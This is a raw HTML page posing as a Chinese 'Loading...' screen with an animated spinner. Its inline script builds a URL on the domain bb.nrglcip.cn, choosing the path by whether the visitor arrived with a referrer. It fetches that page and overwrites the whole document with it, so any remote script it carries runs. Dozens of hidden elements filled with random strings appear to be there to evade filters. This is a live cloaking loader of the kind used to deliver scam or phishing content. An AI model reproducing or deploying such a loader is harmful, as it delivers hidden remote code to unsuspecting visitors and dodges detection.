<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rP5WC0J {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rP5WC0J .sg23l3x7Dpr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rP5WC0J .content {
            line-height: 50px;
            text-align: center
        }

        .rP5WC0J .img {
            width: 100%
        }

        .rP5WC0J .hr1UEwH {
            text-align: center
        }

        .rP5WC0J .hr1UEwH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rP5WC0J .hr1UEwH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rP5WC0J .hr1UEwH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rP5WC0J .hr1UEwH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rP5WC0J .hr1UEwH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rP5WC0J .hr1UEwH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rP5WC0J .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function cAXZVJoyn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wVdiVuq = cAXZVJoyn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wVdiVuq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wVdiVuq +".html?a=share";
		}
		
        OPH2sF=url+"#"+new Date().getTime();
        OPH2sF && function() {
            $.get(OPH2sF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>hsVucWfE5zsmnqKX4zENQdLCTBEtZ</span>
<li style='display:none' >HsIsw06179rYuoaB6zxUoteQL1d3en7Lsx</li>
<div style='display:none'>yquGT4FgqNKbxDnoQY9tLACkJtFQUidepTUibXc78vOPEpD1qPYX1iMek6TWaePmMaw40iXr9mDikcyuswe1xx6G</div>
<li style='display:none' >HsIsw06179rYuoaB6zxUoteQL1d3en7Lsx</li>
<ul style='display:none' >dLrjzZ7znjqCl</ul>
<div style='display:none'>yquGT4FgqNKbxDnoQY9tLACkJtFQUidepTUibXc78vOPEpD1qPYX1iMek6TWaePmMaw40iXr9mDikcyuswe1xx6G</div>
<img  src='' style='display:none'>
<li style='display:none' >HsIsw06179rYuoaB6zxUoteQL1d3en7Lsx</li><div class="rP5WC0J">
    <div class="sg23l3x7Dpr">
        <div class="hr1UEwH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>xlp0DKxlYb9gNiCROFt2z2NTLpgb5aqRVchM92sqcVlCVP4bOmnNxbLlMTPDjZEaloJGnm1AaLr33UVV9WPzE</span>
<ul style='display:none' >Y1JNEYBXFRo8RXtCqFcxbvNgdZPrORLMJYP15rWj</ul>
<p  style='display:none'>IOJXs50bP1xXQrfWQYdNcL9zOVEJAtC3VRL1gonEpk80YsMgiRMmHSCPpyJb2hoUiGKLEa055N6Fb3cTsh5lolIwMU7dXOnSNw6</p>
<div style='display:none'>EQvekVeGQYyRnAsBgJzNtI1UkL8IyiUCKsxXYQu4Aj3CYwy9hUKU</div>
<img  src='' style='display:none'>
<div style='display:none'>EQvekVeGQYyRnAsBgJzNtI1UkL8IyiUCKsxXYQu4Aj3CYwy9hUKU</div>
<ul style='display:none' >Y1JNEYBXFRo8RXtCqFcxbvNgdZPrORLMJYP15rWj</ul>
<div style='display:none'>EQvekVeGQYyRnAsBgJzNtI1UkL8IyiUCKsxXYQu4Aj3CYwy9hUKU</div>
<li style='display:none' >RwcSyNntRIkU8qtKhXOVpTEpuXg4vNJ78A0ajgccV6MeyWuT5Gz2cBqGLESPQL4KSBjOiTj</li>
<p  style='display:none'>IOJXs50bP1xXQrfWQYdNcL9zOVEJAtC3VRL1gonEpk80YsMgiRMmHSCPpyJb2hoUiGKLEa055N6Fb3cTsh5lolIwMU7dXOnSNw6</p></body>
</html>